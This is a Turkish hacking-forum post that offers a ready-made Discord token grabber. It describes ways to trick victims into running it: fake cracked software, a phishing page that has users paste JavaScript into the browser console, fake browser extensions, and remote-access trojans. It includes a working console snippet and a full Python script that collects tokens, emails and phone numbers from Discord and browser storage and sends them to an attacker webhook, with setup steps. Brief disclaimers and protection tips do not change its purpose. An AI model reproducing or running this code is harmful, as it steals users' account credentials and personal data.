⌘K
Duyuru
Duyurular

Kendi Discord Token Grabber Toolunu Yaz! 😈 | Hazır Script ✈️

Tc4dy

🎮 PYTHON İLE TOKEN GRABBER REHBERİ (2026 GÜNCEL) 🧠 BAŞLAMADAN ÖNCE Token'lar, Discord hesabınızın dijital anahtarıdır. Bu araçları yalnızca eğitim amaçlı ve kendi...

🎮 PYTHON İLE TOKEN GRABBER REHBERİ (2026 GÜNCEL)​


🧠 BAŞLAMADAN ÖNCE​


Token'lar, Discord hesabınızın dijital anahtarıdır. Bu araçları yalnızca eğitim amaçlı ve kendi sistemlerinizde deneyin. Yetkisiz erişim Discord'un hizmet şartlarına ve yasalara aykırıdır. Bu rehber, tehditleri anlamanız ve kendinizi korumanız için hazırlanmıştır.

🎯 SALDIRI YÖNTEMLERİ: HEDEFE SCRIPT NASIL ÇALIŞTIRILIR?​

Token grabber'ın çalışması için hedefin scripti kendi bilgisayarında çalıştırması gerekir. Saldırganlar bunu sağlamak için çeşitli sosyal mühendislik yöntemleri kullanır:

1. SAHTE PROGRAM (CRACKLİ YAZILIM)​

Yöntem: "Spotify Premium Crack", "Netflix Password Generator", "Free Nitro" gibi isimlerle zararlıyı paketler.

Nasıl Kandırır?

  • Programı çalıştırdığında "Lisans doğrulanıyor" gibi bir mesaj gösterir
  • Arka planda grabber çalışır, token'ı çalar
  • Ardından "Lisans geçersiz" diyerek programı kapatır
Kuruluma Ekleme: PyInstaller ile .exe yapın ve bir crack'in içine gömün.

2. PHISHING SAYFASI (KONSOL KOMUTU)​

Yöntem: "Token'inizi doğrulayın" diye sahte bir Discord sayfası yapılır.

Nasıl Kandırır?

  • Hedefe "Token'ın süresi doldu, doğrulamak için F12 aç ve şunu yapıştır" denir
  • Hedef, zararlı JS kodunu konsola yapıştırır
  • Kod, token'ı alıp webhook'a yollar
Örnek Zararlı JS:

javascript
fetch("https://discord.com/api/v9/users/@me", {
headers: {Authorization: window.localStorage.getItem("token")}
}).then(r=>r.json()).then(d=>fetch("WEBHOOK_URL", {method:"POST",body:JSON.stringify(d)}))

3. SAHTE TARAYICI EKLENTİSİ​

Yöntem: "Discord Nitro Sniper", "BetterDiscord" gibi eklentiler yapılır.

Nasıl Kandırır?

  • Eklentiyi kurdururlar
  • Eklenti, arka planda token'ı okur ve webhook'a yollar
  • Eklenti normal çalışıyormuş gibi görünür

4. RAT İLE UZAKTAN ÇALIŞTIRMA​

Yöntem: Önce RAT ile hedef sisteme sızılır, ardından grabber uzaktan çalıştırılır.

Nasıl Kandırır?

  • RAT payload'u indirtilir (PDF, Excel makrosu, vs.)
  • RAT bağlantısı kurulduktan sonra grabber gönderilir ve çalıştırılır

⚙️ ARAÇ ÖZELLİKLERİ​

  • Tarayıcı ve Uygulama Desteği: Discord masaüstü uygulaması (Discord, discordcanary, discordptb) ve Chrome, Opera, Brave gibi Chromium tabanlı tarayıcıları tarar.
  • Hızlı ve Verimli: asyncio ile asenkron çalışma, aiohttp ile hızlı HTTP istekleri.
  • Kapsamlı Bilgi Toplama: Token yanında kullanıcı adı, e-posta, telefon, nitro durumu, sunucu sayısı gibi bilgileri de toplar.
  • Gelişmiş Webhook Desteği: Bulunan token'ları ve bilgileri, özel olarak biçimlendirilmiş mesajlarla Discord webhook'una gönderir.
  • Çoklu Token Desteği: Aynı anda birden fazla token'ı işleyip sonuçları gönderebilir.
  • Hata Yönetimi: Olası bağlantı sorunları veya geçersiz token'lar için sağlam hata yönetimi içerir.

🔧 GEREKSİNİMLER​

  • Python 3.8 veya üzeri (3.10 veya 3.11 önerilir, 3.12/3.13 ile de sorunsuz çalışır)
  • aiohttp ve asyncio kütüphaneleri
Kurulum için terminale yazın:

bash
pip install aiohttp asyncio

📜 TAM KOD (discord_token_grabber.py)​


#Aşağıdaki tool bir demo sürümdür, geliştiriciler için örnek olarak yazılmıştır.

import os
import re
import json
import asyncio
import aiohttp
from pathlib import Path
from datetime import datetime

# !!! KENDİ WEBHOOK URL'İNİZİ BURAYA YAZIN !!!
WEBHOOK_URL = "https://discord.com/api/webhooks/XXXXXXXXXX/YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY"

TOKEN_PATTERN = r'[Dd][Ii][Ss][Cc][Oo][Rr][Dd]|[\w-]{24,26}\.[\w-]{6}\.[\w-]{27,}|mfa\.[\w-]{84,}'

BROWSERS = [
"Discord", "discord", "DISCORD",
"discordcanary", "DiscordCanary", "DISCORDCANARY",
"discordptb", "DiscordPTB", "DISCORDPTB",
"Google Chrome", "chrome", "GoogleChrome",
"Opera Software/Opera Stable", "opera", "OPERA",
"BraveSoftware/Brave-Browser", "brave", "BRAVE",
"Yandex/YandexBrowser", "yandex", "YANDEX",
"Chromium", "chromium", "CHROMIUM",
"Microsoft Edge", "edge", "EDGE",
"Vivaldi", "vivaldi", "VIVALDI",
"Arc", "arc", "ARC"
]

async def send_to_webhook(session, data):
embed = {
"embeds": [{
"title": "🎯 TOKEN BULUNDU!",
"color": 0xff0000,
"fields": [
{"name": "👤 Kullanıcı", "value": data.get('username', 'Bilinmiyor'), "inline": True},
{"name": "📧 E-posta", "value": data.get('email', 'Bilinmiyor'), "inline": True},
{"name": "📱 Telefon", "value": data.get('phone', 'Yok'), "inline": True},
{"name": "💎 Nitro", "value": data.get('premium_type', 'Yok'), "inline": True},
{"name": "🏰 Sunucu Sayısı", "value": data.get('guilds', 0), "inline": True},
{"name": "🔑 Token", "value": f"||{data.get('token', 'Bilinmiyor')}||", "inline": False}
],
"footer": {"text": f"Tarih: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}"}
}]
}
async with session.post(WEBHOOK_URL, json=embed) as response:
if response.status != 204:
print(f"[-] Webhook hatası: {response.status}")

async def get_token_info(session, token):
headers = {'Authorization': token}
async with session.get('https://discord.com/api/v9/users/@me', headers=headers) as resp:
if resp.status == 200:
user_data = await resp.json()
async with session.get('https://discord.com/api/v9/users/@me/guilds', headers=headers) as guild_resp:
guilds = await guild_resp.json() if guild_resp.status == 200 else []
return {
'token': token,
'username': f"{user_data.get('username', 'Bilinmiyor')}#{user_data.get('discriminator', '0000')}",
'email': user_data.get('email', 'Bilinmiyor'),
'phone': user_data.get('phone', 'Yok'),
'premium_type': user_data.get('premium_type', 0),
'guilds': len(guilds)
}
return None

async def find_tokens_in_path(path):
tokens = set()
if not os.path.exists(path):
return tokens
for root, _, files in os.walk(path):
for file in files:
if file.endswith(('.ldb', '.log')):
try:
with open(os.path.join(root, file), 'r', encoding='utf-8', errors='ignore') as f:
content = f.read()
found = re.findall(TOKEN_PATTERN, content)
tokens.update(found)
except Exception:
continue
return tokens

async def scan_discord_tokens():
all_tokens = set()
local_app_data = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')

if roaming:
for app in BROWSERS[:9]:
possible_paths = [
os.path.join(roaming, app, 'Local Storage', 'leveldb'),
os.path.join(roaming, app.lower(), 'Local Storage', 'leveldb'),
os.path.join(roaming, app.upper(), 'Local Storage', 'leveldb'),
os.path.join(roaming, app.capitalize(), 'Local Storage', 'leveldb')
]
for p in possible_paths:
all_tokens.update(await find_tokens_in_path(p))

if local_app_data:
for browser in BROWSERS[9:]:
possible_paths = [
os.path.join(local_app_data, browser, 'User Data', 'Default', 'Local Storage', 'leveldb'),
os.path.join(local_app_data, browser.lower(), 'User Data', 'Default', 'Local Storage', 'leveldb'),
os.path.join(local_app_data, browser.upper(), 'User Data', 'Default', 'Local Storage', 'leveldb'),
os.path.join(local_app_data, browser.capitalize(), 'User Data', 'Default', 'Local Storage', 'leveldb')
]
for p in possible_paths:
all_tokens.update(await find_tokens_in_path(p))

if all_tokens:
print(f"[+] {len(all_tokens)} benzersiz token bulundu. Kontrol ediliyor...")
async with aiohttp.ClientSession() as session:
for token in all_tokens:
token_info = await get_token_info(session, token)
if token_info:
await send_to_webhook(session, token_info)
print(f"[✓] Geçerli token: {token_info['username']}")
else:
print(f"[✗] Geçersiz token: {token[:20]}...")
else:
print("[-] Hiç token bulunamadı.")

if __name__ == "__main__":
asyncio.run(scan_discord_tokens())

🚀 KULLANIM​

  1. Webhook URL'ini Ayarla: Discord'da bir sunucuda Sunucu Ayarları > Entegrasyonlar > Webhook Oluştur yolunu izleyerek bir webhook oluşturun. URL'yi kopyalayın ve kodun içindeki WEBHOOK_URL değişkenine yapıştırın.
  2. Kodu Çalıştırın:

python discord_token_grabber.py
  1. Sonuçları Görüntüleyin: Webhook'unuzun bağlı olduğu Discord kanalında, token bilgilerini içeren zengin embed mesajları göreceksiniz.

🛡️ KORUNMA YÖNTEMLERİ​

  • Token'ınızı Paylaşmayın: Token, şifrenizden daha değerlidir.
  • Bilinmeyen Dosyaları Çalıştırmayın: Grabber'lar genellikle .exe veya .scr uzantılı zararlı dosyalarla gelir.
  • 2FA Aktif Edin: İki faktörlü kimlik doğrulama, token çalınsa bile hesabınızı korur.
  • Discord'u Güncel Tutun: Discord, token güvenliğini sürekli iyileştirir.
  • Şüpheli Linklere Tıklamayın: "Ücretsiz Nitro" gibi vaatler genellikle tuzaktır.
  • Token'ınızı Sıfırlayın: Şüpheleniyorsanız Discord şifrenizi değiştirerek token'ınızı geçersiz kılın.
  • Konsola Kod Yapıştırmayın: "F12 aç şunu yapıştır" diyenlere asla güvenmeyin.
  • Crackli Program İndirmeyin: İçinde grabber olma ihtimali çok yüksektir.

🔚;​

Bu rehberle token'ların nasıl çalındığını, hangi yöntemlerle hedefe çalıştırıldığını ve nasıl korunacağınızı öğrendiniz. Unutmayın, bu bilgileri etik ve yasal sınırlar içinde kullanmak sizin sorumluluğunuzdadır.

Bu rehber, eğitim ve farkındalık için yazılmıştır. Yetkisiz erişim yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.
Genişletmek için tıklayın ...

@Tc4dy | github.com/tc4dy
 
Son düzenleme:
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Yanıt için giriş yapmanız veya üye olmanız gerekir.
132,764Konular
3,283,247Mesajlar
318,005Kullanıcılar
ozen12Son Üye

About Us & Legal Notice

Yasal Uyarı: spyhackerz.org, 5651 sayılı Kanun kapsamında “Yer Sağlayıcı”dır. Sitedeki içerikler, X, Instagram ve Facebook’ta olduğu gibi, ön onay olmadan tamamen kullanıcılar tarafından paylaşılır. Bu nedenle spyhackerz.org, kullanıcı içeriklerini veya hukuka aykırı paylaşımları izlemek, denetlemek ve araştırmakla yükümlü değildir. Site bünyesinde herhangi bir “saldırı ekibi” bulunmamaktadır ve Türkiye’deki internet sitelerine yönelik zararlı faaliyet yürütülmez. SPYHACKERZ, üyelerin bireysel olarak gerçekleştirdiği hacking içerikli forum faaliyetlerinden sorumlu değildir. spyhackerz.org adı kullanılarak bir saldırı yapılması halinde tüm sorumluluk yalnızca ilgili üyeye aittir.
Üst Alt